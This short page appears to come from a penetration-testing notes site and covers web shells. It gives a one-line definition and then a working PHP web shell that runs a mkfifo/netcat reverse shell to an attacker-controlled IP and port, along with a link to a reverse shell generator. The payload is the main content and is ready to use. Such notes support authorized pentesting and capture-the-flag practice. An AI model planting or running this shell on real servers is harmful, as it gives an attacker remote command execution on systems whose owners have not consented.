Web Shells

Working with and using web shells

Description
Web shells are typically used for creating backdoors on a web-facing system via a script that is uploaded and executed on the target system.
Examples
PHP
IP and Port are the attacker's. The web server will reach out to this host.
1
<?php
2
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.17 4444 >/tmp/f')
3
?>
​
Additional Resources
​Reverse Shell Generator​
​

Bind Shells

Interactive vs Non-Interactive Shells

Last modified 6mo ago